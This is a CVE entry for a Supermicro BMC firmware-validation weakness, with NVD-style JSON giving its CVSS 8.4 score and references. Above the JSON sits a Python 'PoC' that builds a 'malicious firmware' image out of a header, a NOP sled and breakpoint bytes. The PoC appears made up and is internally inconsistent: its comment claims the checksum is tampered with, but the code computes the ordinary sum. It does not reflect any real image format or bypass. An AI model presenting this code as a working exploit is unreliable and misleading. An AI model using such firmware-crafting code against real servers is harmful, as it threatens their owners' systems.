CVE-2025-12007

PoC代码示例：python import struct def create_malicious_firmware(): # 构造恶意固件镜像 header = struct.pack('<I', 0x5F424D43) # 魔数 version = struct.pack('<I', 0x00000001) payload = b'\x90' * 256 # NOP sled payload += b'\xcc' * 100 # 中断点 # 篡改校验和 checksum = sum(payload) & 0xFFFFFFFF checksum = struct.pack('<I', checksum) with open('malicious_bmc.bin', 'wb') as f: f.write(header + version + checksum + payload) print('恶意固件镜像已生成') if __name__ == '__main__': create_malicious_firmware()

{"cve": {"id": "CVE-2025-12007", "sourceIdentifier": "def9a96e-e099-41a9-bfac-30fd4f82c411", "published": "2026-01-16T09:15:59.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a vulnerability in the Supermicro BMC firmware validation logic at Supermicro MBD-X13SEM-F . An attacker can update the system firmware with a specially crafted image."}, {"lang": "es", "value": "Existe una vulnerabilidad en la lógica de validación del firmware BMC de Supermicro en el Supermicro MBD-X13SEM-F. Un atacante puede actualizar el firmware del sistema con una imagen especialmente diseñada."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "def9a96e-e099-41a9-bfac-30fd4f82c411", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://www.supermicro.com/en/support/security_BMC_IPMI_Jan_2026", "source": "def9a96e-e099-41a9-bfac-30fd4f82c411"}]}}